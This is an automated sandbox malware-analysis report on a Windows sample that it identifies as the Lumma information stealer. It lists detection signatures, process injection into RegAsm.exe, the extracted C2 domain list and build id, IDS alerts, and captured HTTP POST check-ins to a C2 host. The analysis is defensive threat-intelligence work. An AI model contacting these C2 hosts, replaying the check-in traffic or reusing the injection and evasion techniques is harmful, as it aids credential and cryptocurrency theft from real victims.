Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NewInst.exe

Overview

General Information

Sample name:NewInst.exe
Analysis ID:1501436
MD5:c2e7e93d02fa7cba953e3dd4463ba91b
SHA1:ff908dd3556d49e45b2ef917f441a0035ac5aa97
SHA256:4e62b2ec1f99fbfaab9b6a9253da40e00d4e5bf9cbecb29e6e77284af424d0d8
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NewInst.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\NewInst.exe" MD5: C2E7E93D02FA7CBA953E3DD4463BA91B)
    • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 7640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["stamppreewntnq.shop", "locatedblsoqp.shop", "froytnewqowv.shop", "condedqpwqm.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stagedchheiqwo.shop"], "Build id": "1AsNN2--pp1337"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    Timestamp:2024-08-29T22:59:00.462756+0200
    SID:2049812
    Severity:1
    Source Port:49731
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T22:59:00.462756+0200
    SID:2054653
    Severity:1
    Source Port:49731
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T22:58:58.728283+0200
    SID:2055478
    Severity:1
    Source Port:49543
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T22:58:59.391011+0200
    SID:2049836
    Severity:1
    Source Port:49730
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T22:58:59.391011+0200
    SID:2054653
    Severity:1
    Source Port:49730
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T22:58:59.995093+0200
    SID:2055488
    Severity:1
    Source Port:49731
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T22:58:59.226042+0200
    SID:2055488
    Severity:1
    Source Port:49730
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: NewInst.exeAvira: detected
    Source: millyscroqwp.shopAvira URL Cloud: Label: malware
    Source: stamppreewntnq.shopAvira URL Cloud: Label: phishing
    Source: condedqpwqm.shopAvira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/Avira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/apivAvira URL Cloud: Label: phishing
    Source: caffegclasiqwp.shopAvira URL Cloud: Label: malware
    Source: froytnewqowv.shopAvira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/apiAvira URL Cloud: Label: malware
    Source: locatedblsoqp.shopAvira URL Cloud: Label: phishing
    Source: stagedchheiqwo.shopAvira URL Cloud: Label: phishing
    Source: traineiwnqo.shopAvira URL Cloud: Label: malware
    Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["stamppreewntnq.shop", "locatedblsoqp.shop", "froytnewqowv.shop", "condedqpwqm.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stagedchheiqwo.shop"], "Build id": "1AsNN2--pp1337"}
    Source: NewInst.exeReversingLabs: Detection: 52%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: NewInst.exeJoe Sandbox ML: detected
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: caffegclasiqwp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stamppreewntnq.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stagedchheiqwo.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: millyscroqwp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: evoliutwoqm.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: condedqpwqm.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: traineiwnqo.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: locatedblsoqp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: froytnewqowv.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 1AsNN2--pp1337
    Source: NewInst.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: NewInst.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb source: NewInst.exe
    Source: Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb0j source: NewInst.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]2_2_00433065
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi+edx+09h], 00000000h2_2_0042E6A2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0040F076
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_004350C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea ecx, dword ptr [edx+edx*4]2_2_004098D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, word ptr [ecx]2_2_004190D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004208D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041B0F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]2_2_0041B0F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, dword ptr [esp+3Ch]2_2_0041B0F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00419140
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00436140
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_00404110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00420110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [ebx]2_2_004369D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx2_2_0041A1D7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx2_2_0041A1E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_004149A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_004149A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_004149A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]2_2_0041DA40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]2_2_0041DA60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0041DA60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_0040F277
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041B280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]2_2_0041B280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0042A340
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00432300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx2_2_00434B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00434B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, dword ptr [esp+10h]2_2_00421320
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0041A3C9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00410BEB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_004033F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 84AA3BD1h2_2_004363F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004193A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp eax, 03h2_2_00404460
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004144C9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx2_2_00434CD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00434CD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]2_2_004304B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00413540
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx2_2_0042ED70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_0040BD2D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]2_2_0041DA40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+esi+02h], 0000h2_2_00415DA4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00420E70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041EE7E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00412E3B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]2_2_0041F6D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx2_2_00434EE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00434EE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h2_2_00419E8F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00419E8F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_0041FEA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+08h], ecx2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000000D8h]2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+3Ch]2_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00434FE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ecx2_2_00411F94
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00435FA0

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2055478 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) : 192.168.2.4:49543 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.4:49731 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.4:49730 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
    Source: Malware configuration extractorURLs: stamppreewntnq.shop
    Source: Malware configuration extractorURLs: locatedblsoqp.shop
    Source: Malware configuration extractorURLs: froytnewqowv.shop
    Source: Malware configuration extractorURLs: condedqpwqm.shop
    Source: Malware configuration extractorURLs: evoliutwoqm.shop
    Source: Malware configuration extractorURLs: millyscroqwp.shop
    Source: Malware configuration extractorURLs: traineiwnqo.shop
    Source: Malware configuration extractorURLs: caffegclasiqwp.shop
    Source: Malware configuration extractorURLs: stagedchheiqwo.shop
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=SfhHzATm1_X35cO.QY4Q0ZDZyFTO72B.imsig2iyZtI-1724965139-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: froytnewqowv.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: froytnewqowv.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/
    Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1940966413.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/api
    Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/apiv
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042A0F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042A0F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042A0F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042A0F0

    System Summary

    barindex
    Source: NewInst.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 273408
    Source: C:\Users\user\Desktop\NewInst.exeCode function: 0_2_021B0B200_2_021B0B20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042F0002_2_0042F000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C9A22_2_0040C9A2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433D5A2_2_00433D5A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E6A22_2_0042E6A2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F0762_2_0040F076
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041401B2_2_0041401B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004350C02_2_004350C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004098D02_2_004098D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004118E22_2_004118E2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B0F02_2_0041B0F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D9102_2_0042D910
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004369D02_2_004369D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004149A02_2_004149A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DA402_2_0041DA40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DA602_2_0041DA60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407A202_2_00407A20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062302_2_00406230
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408AC02_2_00408AC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B2802_2_0041B280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00434B0F2_2_00434B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A3C92_2_0041A3C9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410BEB2_2_00410BEB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004363F02_2_004363F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004073902_2_00407390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F4402_2_0041F440
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004044602_2_00404460
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D4102_2_0040D410
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00434CD02_2_00434CD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004324E02_2_004324E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004025402_2_00402540
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004345632_2_00434563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BD2D2_2_0040BD2D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411DC32_2_00411DC3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D5E02_2_0041D5E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CD902_2_0041CD90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DA402_2_0041DA40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041EE7E2_2_0041EE7E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406ED02_2_00406ED0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004356D42_2_004356D4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004366E02_2_004366E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00434EE02_2_00434EE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404E802_2_00404E80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419E8F2_2_00419E8F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EEA42_2_0040EEA4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041275E2_2_0041275E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403F602_2_00403F60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00423FC02_2_00423FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00434FE02_2_00434FE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411F942_2_00411F94
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004095B0 appears 43 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409E90 appears 111 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764
    Source: NewInst.exe, 00000000.00000002.1667455325.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NewInst.exe
    Source: NewInst.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
